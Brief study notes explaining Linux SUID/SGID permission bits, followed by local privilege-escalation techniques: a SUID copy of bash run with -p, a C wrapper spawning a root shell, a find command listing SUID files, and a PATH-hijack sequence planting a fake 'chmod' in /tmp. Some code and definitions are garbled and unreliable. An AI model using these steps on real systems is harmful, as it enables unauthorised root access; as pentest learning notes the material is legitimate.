Setuid (SUID)

If SUID is set, the file will be executed with the privilege of the file user.

Setgid (SGID)

File: the file will be executed with the privilege of the filegroup. Directory: files created within that dir will inherit group privilege.

These permissions are represented by the 'execute' part, and when set it will be 's'.

Each User has 3 user ids:

  • Real id: UID

  • EffectiveID: EUID

  • SavedID: GID


Rootbash SUID:

Copy of /bin/bash as rootbash, and make sure it's owned by root and suid is set.

Now it can be executed as rootbash -p


Init main() {
	System("/bin/bash" -p)

Gcc -o <name> <code_filename.c>

Find files by permissions type

find / -perm -u=s -type f 2>/dev/null


Using SUID "where"

  1. Where root login is required to execute some commands/programs/scripts.

  2. Where you don’t want to give credentials of a particular user but want to run some programs as the owner.

  3. Where you don’t want to use SUDO command but want to give execute permission for a file/script etc.

If there is any execution we may be able to gain root access by exploiting PATH variable.

cd /tmp
echo '/bin/bash' > chmod
chmod 777 chmod
echo $PATH
export PATH=/tmp:$PATH
cd /usr/local/bin

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